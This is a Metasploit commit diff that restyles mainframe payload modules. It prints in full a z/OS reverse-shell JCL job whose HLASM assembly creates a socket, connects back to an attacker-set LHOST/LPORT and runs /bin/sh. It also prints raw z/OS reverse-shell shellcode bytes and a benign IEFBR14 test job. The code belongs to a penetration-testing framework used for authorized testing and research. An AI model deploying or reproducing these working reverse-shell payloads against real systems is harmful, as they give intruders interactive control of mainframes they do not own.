Land #6810, JCL payload style fixes

bug/bundler_fix
Adam Cammack 2016-04-24 13:32:32 -04:00
commit f23e09f838
No known key found for this signature in database
GPG Key ID: C9378BA088092D66
5 changed files with 257 additions and 261 deletions

View File

@ -44,7 +44,7 @@ class PayloadCachedSize
def self.update_cache_constant(data, cached_size)
data.
gsub(/^\s*CachedSize\s*=\s*(\d+|:dynamic).*/, '').
gsub(/^(module Metasploit\d+)\s*\n/) do |m|
gsub(/^(module MetasploitModule)\s*\n/) do |m|
"#{m.strip}\n\n CachedSize = #{cached_size}\n\n"
end
end

View File

@ -7,7 +7,6 @@
# for more information on IEFBR14
##
require 'msf/core'
require 'msf/core/handler/find_shell'
require 'msf/base/sessions/mainframe_shell'
@ -15,50 +14,49 @@ require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = :dynamic
include Msf::Payload::Single
include Msf::Payload::Mainframe
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Generic JCL Test for Mainframe Exploits',
'Description' => 'Provide JCL which can be used to submit
a job to JES2 on z/OS which will exit and return 0. This
can be used as a template for other JCL based payloads',
'Author' => 'Bigendian Smalls',
'License' => MSF_LICENSE,
'Platform' => 'mainframe',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::None,
'Session' => Msf::Sessions::MainframeShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'jcl',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
'Name' => 'Generic JCL Test for Mainframe Exploits',
'Description' => 'Provide JCL which can be used to submit
a job to JES2 on z/OS which will exit and return 0. This
can be used as a template for other JCL based payloads',
'Author' => 'Bigendian Smalls',
'License' => MSF_LICENSE,
'Platform' => 'mainframe',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::None,
'Session' => Msf::Sessions::MainframeShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'jcl',
'Payload' =>
{
'Offsets' => {},
'Payload' => ''
}
)
)
end
##
# Construct the paload
##
def generate
return super + command_string
super + command_string
end
##
# Build the command string for JCL submission
##
def command_string
return "//DUMMY JOB (MFUSER),'dummy job',\n" +
"// NOTIFY=&SYSUID,\n" +
"// MSGCLASS=H,\n" +
"// MSGLEVEL=(1,1),\n" +
"// REGION=0M\n" +
"// EXEC PGM=IEFBR14\n"
"//DUMMY JOB (MFUSER),'dummy job',\n" \
"// NOTIFY=&SYSUID,\n" \
"// MSGCLASS=H,\n" \
"// MSGLEVEL=(1,1),\n" \
"// REGION=0M\n" \
"// EXEC PGM=IEFBR14\n"
end
end

View File

@ -8,7 +8,6 @@
# on the system as JCL to JES2
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/mainframe_shell'
@ -16,7 +15,7 @@ require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = :dynamic
CachedSize = 9001
include Msf::Payload::Single
include Msf::Payload::Mainframe
@ -24,227 +23,228 @@ module MetasploitModule
def initialize(info = {})
super(merge_info(info,
'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP',
'Description' => 'Provide JCL which creates a reverse shell
This implmentation does not include ebcdic character translation,
so a client with translation capabilities is required. MSF handles
this automatically.',
'Author' => 'Bigendian Smalls',
'License' => MSF_LICENSE,
'Platform' => 'mainframe',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::MainframeShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'jcl',
'Payload' =>
'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP',
'Description' => 'Provide JCL which creates a reverse shell
This implmentation does not include ebcdic character translation,
so a client with translation capabilities is required. MSF handles
this automatically.',
'Author' => 'Bigendian Smalls',
'License' => MSF_LICENSE,
'Platform' => 'mainframe',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::MainframeShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'jcl',
'Payload' =>
{
'Offsets' =>
{
'LHOST' => [ 0x1b29, 'custom' ],
'LPORT' => [ 0x1b25, 'custom' ],
'LPORT' => [ 0x1b25, 'custom' ]
},
'Payload' =>
"//REVSHL JOB (USER),'Reverse shell jcl',\n" +
"// NOTIFY=&SYSUID,\n" +
"// MSGCLASS=H,\n" +
"// MSGLEVEL=(1,1),\n" +
"// REGION=0M\n" +
"//**************************************/\n" +
"//* Generates reverse shell */\n" +
"//**************************************/\n" +
"//*\n" +
"//STEP1 EXEC PROC=ASMACLG\n" +
"//SYSIN DD *,DLM=ZZ\n" +
" TITLE 'z/os Reverse Shell'\n" +
"NEWREV CSECT\n" +
"NEWREV AMODE 31\n" +
"NEWREV RMODE 31\n" +
"***********************************************************************\n" +
"* SETUP registers and save areas *\n" +
"***********************************************************************\n" +
"MAIN LR 7,15 # R7 is base register\n" +
" NILH 7,X'1FFF' # ensure local address\n" +
" USING MAIN,0 # R8 for addressability\n" +
" DS 0H # halfword boundaries\n" +
" LA 1,ZEROES(7) # address byond which should be all 0s\n" +
" XC 0(204,1),0(1) # clear zero area\n" +
" LA 13,SAVEAREA(7) # address of save area\n" +
" LHI 8,8 # R8 has static 8\n" +
" LHI 9,1 # R9 has static 1\n" +
" LHI 10,2 # R10 has static 2\n" +
"\n" +
"***********************************************************************\n" +
"* BPX1SOC set up socket *\n" +
"***********************************************************************\n" +
"BSOC LA 0,@@F1(7) # USS callable svcs socket\n" +
" LA 3,8 # n parms\n" +
" LA 5,DOM(7) # Relative addr of First parm\n" +
" ST 10,DOM(7) # store a 2 for AF_INET\n" +
" ST 9,TYPE(7) # store a 1 for sock_stream\n" +
" ST 9,DIM(7) # store a 1 for dim_sock\n" +
" LA 15,CLORUN(7) # address of generic load & run\n" +
" BASR 14,15 # Branch to load & run\n" +
"\n" +
"***********************************************************************\n" +
"* BPX1CON (connect) connect to rmt host *\n" +
"***********************************************************************\n" +
"BCON L 5,CLIFD(7) # address of client file descriptor\n" +
" ST 5,CLIFD2(7) # store for connection call\n" +
"*** main processing **\n" +
" LA 1,SSTR(7) # packed socket string\n" +
" LA 5,CLIFD2(7) # dest for our sock str\n" +
" MVC 7(9,5),0(1) # mv packed skt str to parm array\n" +
" LA 0,@@F2(7) # USS callable svcs connect\n" +
" LA 3,6 # n parms for func call\n" +
" LA 5,CLIFD2(7) # src parm list addr\n" +
" LA 15,CLORUN(7) # address of generic load & run\n" +
" BASR 14,15 # Branch to load & run\n" +
"\n" +
"*************************************************\n" +
"* Preparte the child pid we'll spawn *\n" +
"* 0) Dupe all 3 file desc of CLIFD *\n" +
"* 1) dupe parent read fd to std input *\n" +
"*************************************************\n" +
" LHI 11,2 # Loop Counter R11=2\n" +
"@LOOP1 BRC 15,LFCNTL # call FCNTL for each FD(in,out,err)\n" +
"@RET1 AHI 11,-1 # Decrement R11\n" +
" CIJ 11,-1,7,@LOOP1 # if R11 >= 0, loop\n" +
"\n" +
"***********************************************************************\n" +
"* BPX1EXC (exec) execute /bin/sh *\n" +
"***********************************************************************\n" +
"LEXEC LA 1,EXCPRM1(7) # top of arg list\n" +
"******************************************\n" +
"**** load array of addr and constants ***\n" +
"******************************************\n" +
" ST 10,EXARG1L(7) # arg 1 len is 2\n" +
" LA 2,EXARG1L(7) # addr of len of arg1\n" +
" ST 2,16(0,1) # arg4 Addr of Arg Len Addrs\n" +
" LA 2,EXARG1(7) # addr of arg1\n" +
" ST 2,20(0,1) # arg5 Addr of Arg Addrs\n" +
" ST 9,EXARGC(7) # store 1 in ARG Count\n" +
"**************************************************************\n" +
"*** call the exec function the normal way ********************\n" +
"**************************************************************\n" +
" LA 0,@@EX1(7) # USS callable svcs EXEC\n" +
" LA 3,13 # n parms\n" +
" LA 5,EXCPRM1(7) # src parm list addr\n" +
" LA 15,CLORUN(7) # address of generic load & run\n" +
" BASR 14,15 # Branch to load & run\n" +
"\n" +
"***********************************************************************\n" +
"*** BPX1FCT (fnctl) Edit our file descriptor **************************\n" +
"***********************************************************************\n" +
"LFCNTL LA 0,@@FC1(7) # USS callable svcs FNCTL\n" +
" ST 8,@ACT(7) # 8 is our dupe2 action\n" +
" L 5,CLIFD(7) # client file descriptor\n" +
" ST 5,@FFD(7) # store as fnctl argument\n" +
" ST 11,@ARG(7) # fd to clone\n" +
" LA 3,6 # n parms\n" +
" LA 5,@FFD(7) # src parm list addr\n" +
" LA 15,CLORUN(7) # address of generic load & run\n" +
" BASR 14,15 # Branch to load & run\n" +
" BRC 15,@RET1 # Return to caller\n" +
"\n" +
"***********************************************************************\n" +
"* LOAD and run R0=func name, R3=n parms *\n" +
"* R5 = src parm list *\n" +
"***********************************************************************\n" +
"CLORUN ST 14,8(,13) # store ret address\n" +
" XR 1,1 # zero R1\n" +
" SVC 8 # get func call addr for R0\n" +
" ST 0,12(13) # Store returned addr in our SA\n" +
" L 15,12(13) # Load func addr into R15\n" +
" LHI 6,20 # offset from SA of first parm\n" +
" LA 1,0(6,13) # start of dest parm list\n" +
"@LOOP2 ST 5,0(6,13) # store parms address in parm\n" +
" AHI 3,-1 # decrement # parm\n" +
" CIJ 3,11,8,@FIX # haky fix for EXEC func\n" +
"@RETX AHI 6,4 # increment dest parm addr\n" +
" AHI 5,4 # increment src parm addr\n" +
" CIJ 3,0,7,@LOOP2 # loop until R3 = 0\n" +
" LA 5,0(6,13)\n" +
" AHI 5,-4\n" +
" OI 0(5),X'80' # last parm first bit high\n" +
"@FIN1 BALR 14,15 # call function\n" +
" L 14,8(,13) # set up return address\n" +
" BCR 15,14 # return to caller\n" +
"@FIX AHI 5,4 # need extra byte skipped for exec\n" +
" BRC 15,@RETX\n" +
"\n" +
"***********************************************************************\n" +
"* Arg Arrays, Constants and Save Area *\n" +
"***********************************************************************\n" +
" DS 0F\n" +
"*************************\n" +
"**** Func Names ****\n" +
"*************************\n" +
"@@F1 DC CL8'BPX1SOC '\n" +
"@@F2 DC CL8'BPX1CON '\n" +
"@@EX1 DC CL8'BPX1EXC ' # callable svcs name\n" +
"@@FC1 DC CL8'BPX1FCT '\n" +
"* # BPX1EXC Constants\n" +
"EXARG1 DC CL2'sh' # arg 1 to exec\n" +
"* # BPX1CON Constants\n" +
"SSTR DC X'100202PPPPaaaaaaaa'\n" +
"* # BPX1EXC Arguments\n" +
"EXCPRM1 DS 0F # actual parm list of exec call\n" +
"EXCMDL DC F'7' # len of cmd to exec\n" +
"EXCMD DC CL7'/bin/sh' # command to exec\n" +
"*********************************************************************\n" +
"******* Below this line is filled in runtime, but at compile ********\n" +
"******* is all zeroes, so it can be dropped from the shell- *********\n" +
"******* code as it will be dynamically added back and the ***********\n" +
"******* offsets are already calulated in the code *******************\n" +
"*********************************************************************\n" +
"ZEROES DS 0F # 51 4 byte slots\n" +
"EXARGC DC F'0' # num of arguments\n" +
"EXARGS DC 10XL4'00000000' # reminaing exec args\n" +
"EXARG1L DC F'0' # arg1 length\n" +
"* # BPX1FCT Arguments\n" +
"@FFD DC F'0' # file descriptor\n" +
"@ACT DC F'0' # fnctl action\n" +
"@ARG DC F'0' # argument to fnctl\n" +
"@RETFD DC F'0' # fd return\n" +
"FR1 DC F'0' # rtn code\n" +
"FR2 DC F'0' # rsn code\n" +
"* # BPX1SOC Arguments\n" +
"DOM DC F'0' # AF_INET = 2\n" +
"TYPE DC F'0' # sock stream = 1\n" +
"PROTO DC F'0' # protocol ip = 0\n" +
"DIM DC F'0' # dim_sock = 1\n" +
"CLIFD DC F'0' # client file descriptor\n" +
"SR1 DC F'0' # rtn val\n" +
"SR2 DC F'0' # rtn code\n" +
"SR3 DC F'0' # rsn code\n" +
"* # BPX1CON Arguments\n" +
"CLIFD2 DC F'0' # CLIFD\n" +
"SOCKLEN DC F'0' # length of Sock Struct\n" +
"SRVSKT DC XL2'0000' # srv socket struct\n" +
" DC XL2'0000' # port\n" +
" DC XL4'00000000' # RHOST 0.0.0.0\n" +
"CR1 DC F'0' # rtn val\n" +
"CR2 DC F'0' # rtn code\n" +
"CR3 DC F'0' # rsn code\n" +
"SAVEAREA DC 18XL4'00000000' # save area for pgm mgmt\n" +
"EOFMARK DC X'deadbeef' # eopgm marker for shellcode\n" +
" END MAIN\n" +
"ZZ\n" +
"//REVSHL JOB (USER),'Reverse shell jcl',\n" \
"// NOTIFY=&SYSUID,\n" \
"// MSGCLASS=H,\n" \
"// MSGLEVEL=(1,1),\n" \
"// REGION=0M\n" \
"//**************************************/\n" \
"//* Generates reverse shell */\n" \
"//**************************************/\n" \
"//*\n" \
"//STEP1 EXEC PROC=ASMACLG\n" \
"//SYSIN DD *,DLM=ZZ\n" \
" TITLE 'z/os Reverse Shell'\n" \
"NEWREV CSECT\n" \
"NEWREV AMODE 31\n" \
"NEWREV RMODE 31\n" \
"***********************************************************************\n" \
"* SETUP registers and save areas *\n" \
"***********************************************************************\n" \
"MAIN LR 7,15 # R7 is base register\n" \
" NILH 7,X'1FFF' # ensure local address\n" \
" USING MAIN,0 # R8 for addressability\n" \
" DS 0H # halfword boundaries\n" \
" LA 1,ZEROES(7) # address byond which should be all 0s\n" \
" XC 0(204,1),0(1) # clear zero area\n" \
" LA 13,SAVEAREA(7) # address of save area\n" \
" LHI 8,8 # R8 has static 8\n" \
" LHI 9,1 # R9 has static 1\n" \
" LHI 10,2 # R10 has static 2\n" \
"\n" \
"***********************************************************************\n" \
"* BPX1SOC set up socket *\n" \
"***********************************************************************\n" \
"BSOC LA 0,@@F1(7) # USS callable svcs socket\n" \
" LA 3,8 # n parms\n" \
" LA 5,DOM(7) # Relative addr of First parm\n" \
" ST 10,DOM(7) # store a 2 for AF_INET\n" \
" ST 9,TYPE(7) # store a 1 for sock_stream\n" \
" ST 9,DIM(7) # store a 1 for dim_sock\n" \
" LA 15,CLORUN(7) # address of generic load & run\n" \
" BASR 14,15 # Branch to load & run\n" \
"\n" \
"***********************************************************************\n" \
"* BPX1CON (connect) connect to rmt host *\n" \
"***********************************************************************\n" \
"BCON L 5,CLIFD(7) # address of client file descriptor\n" \
" ST 5,CLIFD2(7) # store for connection call\n" \
"*** main processing **\n" \
" LA 1,SSTR(7) # packed socket string\n" \
" LA 5,CLIFD2(7) # dest for our sock str\n" \
" MVC 7(9,5),0(1) # mv packed skt str to parm array\n" \
" LA 0,@@F2(7) # USS callable svcs connect\n" \
" LA 3,6 # n parms for func call\n" \
" LA 5,CLIFD2(7) # src parm list addr\n" \
" LA 15,CLORUN(7) # address of generic load & run\n" \
" BASR 14,15 # Branch to load & run\n" \
"\n" \
"*************************************************\n" \
"* Preparte the child pid we'll spawn *\n" \
"* 0) Dupe all 3 file desc of CLIFD *\n" \
"* 1) dupe parent read fd to std input *\n" \
"*************************************************\n" \
" LHI 11,2 # Loop Counter R11=2\n" \
"@LOOP1 BRC 15,LFCNTL # call FCNTL for each FD(in,out,err)\n" \
"@RET1 AHI 11,-1 # Decrement R11\n" \
" CIJ 11,-1,7,@LOOP1 # if R11 >= 0, loop\n" \
"\n" \
"***********************************************************************\n" \
"* BPX1EXC (exec) execute /bin/sh *\n" \
"***********************************************************************\n" \
"LEXEC LA 1,EXCPRM1(7) # top of arg list\n" \
"******************************************\n" \
"**** load array of addr and constants ***\n" \
"******************************************\n" \
" ST 10,EXARG1L(7) # arg 1 len is 2\n" \
" LA 2,EXARG1L(7) # addr of len of arg1\n" \
" ST 2,16(0,1) # arg4 Addr of Arg Len Addrs\n" \
" LA 2,EXARG1(7) # addr of arg1\n" \
" ST 2,20(0,1) # arg5 Addr of Arg Addrs\n" \
" ST 9,EXARGC(7) # store 1 in ARG Count\n" \
"**************************************************************\n" \
"*** call the exec function the normal way ********************\n" \
"**************************************************************\n" \
" LA 0,@@EX1(7) # USS callable svcs EXEC\n" \
" LA 3,13 # n parms\n" \
" LA 5,EXCPRM1(7) # src parm list addr\n" \
" LA 15,CLORUN(7) # address of generic load & run\n" \
" BASR 14,15 # Branch to load & run\n" \
"\n" \
"***********************************************************************\n" \
"*** BPX1FCT (fnctl) Edit our file descriptor **************************\n" \
"***********************************************************************\n" \
"LFCNTL LA 0,@@FC1(7) # USS callable svcs FNCTL\n" \
" ST 8,@ACT(7) # 8 is our dupe2 action\n" \
" L 5,CLIFD(7) # client file descriptor\n" \
" ST 5,@FFD(7) # store as fnctl argument\n" \
" ST 11,@ARG(7) # fd to clone\n" \
" LA 3,6 # n parms\n" \
" LA 5,@FFD(7) # src parm list addr\n" \
" LA 15,CLORUN(7) # address of generic load & run\n" \
" BASR 14,15 # Branch to load & run\n" \
" BRC 15,@RET1 # Return to caller\n" \
"\n" \
"***********************************************************************\n" \
"* LOAD and run R0=func name, R3=n parms *\n" \
"* R5 = src parm list *\n" \
"***********************************************************************\n" \
"CLORUN ST 14,8(,13) # store ret address\n" \
" XR 1,1 # zero R1\n" \
" SVC 8 # get func call addr for R0\n" \
" ST 0,12(13) # Store returned addr in our SA\n" \
" L 15,12(13) # Load func addr into R15\n" \
" LHI 6,20 # offset from SA of first parm\n" \
" LA 1,0(6,13) # start of dest parm list\n" \
"@LOOP2 ST 5,0(6,13) # store parms address in parm\n" \
" AHI 3,-1 # decrement # parm\n" \
" CIJ 3,11,8,@FIX # haky fix for EXEC func\n" \
"@RETX AHI 6,4 # increment dest parm addr\n" \
" AHI 5,4 # increment src parm addr\n" \
" CIJ 3,0,7,@LOOP2 # loop until R3 = 0\n" \
" LA 5,0(6,13)\n" \
" AHI 5,-4\n" \
" OI 0(5),X'80' # last parm first bit high\n" \
"@FIN1 BALR 14,15 # call function\n" \
" L 14,8(,13) # set up return address\n" \
" BCR 15,14 # return to caller\n" \
"@FIX AHI 5,4 # need extra byte skipped for exec\n" \
" BRC 15,@RETX\n" \
"\n" \
"***********************************************************************\n" \
"* Arg Arrays, Constants and Save Area *\n" \
"***********************************************************************\n" \
" DS 0F\n" \
"*************************\n" \
"**** Func Names ****\n" \
"*************************\n" \
"@@F1 DC CL8'BPX1SOC '\n" \
"@@F2 DC CL8'BPX1CON '\n" \
"@@EX1 DC CL8'BPX1EXC ' # callable svcs name\n" \
"@@FC1 DC CL8'BPX1FCT '\n" \
"* # BPX1EXC Constants\n" \
"EXARG1 DC CL2'sh' # arg 1 to exec\n" \
"* # BPX1CON Constants\n" \
"SSTR DC X'100202PPPPaaaaaaaa'\n" \
"* # BPX1EXC Arguments\n" \
"EXCPRM1 DS 0F # actual parm list of exec call\n" \
"EXCMDL DC F'7' # len of cmd to exec\n" \
"EXCMD DC CL7'/bin/sh' # command to exec\n" \
"*********************************************************************\n" \
"******* Below this line is filled in runtime, but at compile ********\n" \
"******* is all zeroes, so it can be dropped from the shell- *********\n" \
"******* code as it will be dynamically added back and the ***********\n" \
"******* offsets are already calulated in the code *******************\n" \
"*********************************************************************\n" \
"ZEROES DS 0F # 51 4 byte slots\n" \
"EXARGC DC F'0' # num of arguments\n" \
"EXARGS DC 10XL4'00000000' # reminaing exec args\n" \
"EXARG1L DC F'0' # arg1 length\n" \
"* # BPX1FCT Arguments\n" \
"@FFD DC F'0' # file descriptor\n" \
"@ACT DC F'0' # fnctl action\n" \
"@ARG DC F'0' # argument to fnctl\n" \
"@RETFD DC F'0' # fd return\n" \
"FR1 DC F'0' # rtn code\n" \
"FR2 DC F'0' # rsn code\n" \
"* # BPX1SOC Arguments\n" \
"DOM DC F'0' # AF_INET = 2\n" \
"TYPE DC F'0' # sock stream = 1\n" \
"PROTO DC F'0' # protocol ip = 0\n" \
"DIM DC F'0' # dim_sock = 1\n" \
"CLIFD DC F'0' # client file descriptor\n" \
"SR1 DC F'0' # rtn val\n" \
"SR2 DC F'0' # rtn code\n" \
"SR3 DC F'0' # rsn code\n" \
"* # BPX1CON Arguments\n" \
"CLIFD2 DC F'0' # CLIFD\n" \
"SOCKLEN DC F'0' # length of Sock Struct\n" \
"SRVSKT DC XL2'0000' # srv socket struct\n" \
" DC XL2'0000' # port\n" \
" DC XL4'00000000' # RHOST 0.0.0.0\n" \
"CR1 DC F'0' # rtn val\n" \
"CR2 DC F'0' # rtn code\n" \
"CR3 DC F'0' # rsn code\n" \
"SAVEAREA DC 18XL4'00000000' # save area for pgm mgmt\n" \
"EOFMARK DC X'deadbeef' # eopgm marker for shellcode\n" \
" END MAIN\n" \
"ZZ\n" \
"//*\n"
}))
end
# replace our own LPORT/LHOST
def replace_var(raw, name, offset, pack)
super
if( name == 'LHOST' and datastore[name] )
if name == 'LHOST' && datastore[name]
val = Rex::Socket.resolv_nbo(datastore[name])
val = val.unpack("H*")[0]
raw[offset, val.length] = val
return true
elsif(name == 'LPORT' and datastore[name] )
elsif name == 'LPORT' && datastore[name]
val = datastore[name]
val = val.to_s(16).rjust(4,'0')
val = val.to_s.to_i.to_s(16).rjust(4, '0')
raw[offset, val.length] = val
return true
else

View File

@ -7,14 +7,12 @@
#
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/mainframe_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = 339
include Msf::Payload::Single
@ -39,30 +37,30 @@ module MetasploitModule
'Offsets' =>
{
'LPORT' => [ 321, 'n' ],
'LHOST' => [ 323, 'ADDR' ],
'LHOST' => [ 323, 'ADDR' ]
},
'Payload' =>
"\x18\x7f\xa5\x76\x1f\xff\x41\x17\x01\x54\xd7\xcb\x10\x00\x10\x00" +
"\x41\xd7\x01\xd8\xa7\x88\x00\x08\xa7\x98\x00\x01\xa7\xa8\x00\x02" +
"\x41\x07\x01\x1c\x41\x30\x00\x08\x41\x57\x01\x9c\x50\xa7\x01\x9c" +
"\x50\x97\x01\xa0\x50\x97\x01\xa8\x41\xf7\x00\xcc\x0d\xef\x58\x57" +
"\x01\xac\x50\x57\x01\xbc\x41\x17\x01\x3e\x41\x57\x01\xbc\xd2\x08" +
"\x50\x07\x10\x00\x41\x07\x01\x24\x41\x30\x00\x06\x41\x57\x01\xbc" +
"\x41\xf7\x00\xcc\x0d\xef\xa7\xb8\x00\x02\xa7\xf4\x00\x1e\xa7\xba" +
"\xff\xff\xec\xb7\xff\xfc\xff\x7e\x41\x17\x01\x48\x50\xa7\x01\x80" +
"\x41\x27\x01\x80\x50\x20\x10\x10\x41\x27\x01\x3c\x50\x20\x10\x14" +
"\x50\x97\x01\x54\x41\x07\x01\x2c\x41\x30\x00\x0d\x41\x57\x01\x48" +
"\x41\xf7\x00\xcc\x0d\xef\x41\x07\x01\x34\x50\x87\x01\x88\x58\x57" +
"\x01\xac\x50\x57\x01\x84\x50\xb7\x01\x8c\x41\x30\x00\x06\x41\x57" +
"\x01\x84\x41\xf7\x00\xcc\x0d\xef\xa7\xf4\xff\xd3\x50\xe0\xd0\x08" +
"\x17\x11\x0a\x08\x50\x0d\x00\x0c\x58\xfd\x00\x0c\xa7\x68\x00\x14" +
"\x41\x16\xd0\x00\x50\x56\xd0\x00\xa7\x3a\xff\xff\xec\x38\x00\x14" +
"\x0b\x7e\xa7\x6a\x00\x04\xa7\x5a\x00\x04\xec\x37\xff\xf5\x00\x7e" +
"\x41\x56\xd0\x00\xa7\x5a\xff\xfc\x96\x80\x50\x00\x05\xef\x58\xe0" +
"\xd0\x08\x07\xfe\xa7\x5a\x00\x04\xa7\xf4\xff\xed\xc2\xd7\xe7\xf1" +
"\xe2\xd6\xc3\x40\xc2\xd7\xe7\xf1\xc3\xd6\xd5\x40\xc2\xd7\xe7\xf1" +
"\xc5\xe7\xc3\x40\xc2\xd7\xe7\xf1\xc6\xc3\xe3\x40\xa2\x88\x10\x02" +
"\x02\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x07\x61\x82\x89\x95" +
"\x18\x7f\xa5\x76\x1f\xff\x41\x17\x01\x54\xd7\xcb\x10\x00\x10\x00" \
"\x41\xd7\x01\xd8\xa7\x88\x00\x08\xa7\x98\x00\x01\xa7\xa8\x00\x02" \
"\x41\x07\x01\x1c\x41\x30\x00\x08\x41\x57\x01\x9c\x50\xa7\x01\x9c" \
"\x50\x97\x01\xa0\x50\x97\x01\xa8\x41\xf7\x00\xcc\x0d\xef\x58\x57" \
"\x01\xac\x50\x57\x01\xbc\x41\x17\x01\x3e\x41\x57\x01\xbc\xd2\x08" \
"\x50\x07\x10\x00\x41\x07\x01\x24\x41\x30\x00\x06\x41\x57\x01\xbc" \
"\x41\xf7\x00\xcc\x0d\xef\xa7\xb8\x00\x02\xa7\xf4\x00\x1e\xa7\xba" \
"\xff\xff\xec\xb7\xff\xfc\xff\x7e\x41\x17\x01\x48\x50\xa7\x01\x80" \
"\x41\x27\x01\x80\x50\x20\x10\x10\x41\x27\x01\x3c\x50\x20\x10\x14" \
"\x50\x97\x01\x54\x41\x07\x01\x2c\x41\x30\x00\x0d\x41\x57\x01\x48" \
"\x41\xf7\x00\xcc\x0d\xef\x41\x07\x01\x34\x50\x87\x01\x88\x58\x57" \
"\x01\xac\x50\x57\x01\x84\x50\xb7\x01\x8c\x41\x30\x00\x06\x41\x57" \
"\x01\x84\x41\xf7\x00\xcc\x0d\xef\xa7\xf4\xff\xd3\x50\xe0\xd0\x08" \
"\x17\x11\x0a\x08\x50\x0d\x00\x0c\x58\xfd\x00\x0c\xa7\x68\x00\x14" \
"\x41\x16\xd0\x00\x50\x56\xd0\x00\xa7\x3a\xff\xff\xec\x38\x00\x14" \
"\x0b\x7e\xa7\x6a\x00\x04\xa7\x5a\x00\x04\xec\x37\xff\xf5\x00\x7e" \
"\x41\x56\xd0\x00\xa7\x5a\xff\xfc\x96\x80\x50\x00\x05\xef\x58\xe0" \
"\xd0\x08\x07\xfe\xa7\x5a\x00\x04\xa7\xf4\xff\xed\xc2\xd7\xe7\xf1" \
"\xe2\xd6\xc3\x40\xc2\xd7\xe7\xf1\xc3\xd6\xd5\x40\xc2\xd7\xe7\xf1" \
"\xc5\xe7\xc3\x40\xc2\xd7\xe7\xf1\xc6\xc3\xe3\x40\xa2\x88\x10\x02" \
"\x02\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x07\x61\x82\x89\x95" \
"\x61\xa2\x88"
}))
end

View File

@ -403,7 +403,7 @@ RSpec.describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/cmd/mainframe/generic_jcl'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'cmd/mainframe/generic_jcl'
end
@ -413,7 +413,7 @@ RSpec.describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/cmd/mainframe/reverse_shell_jcl'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'cmd/mainframe/reverse_shell_jcl'
end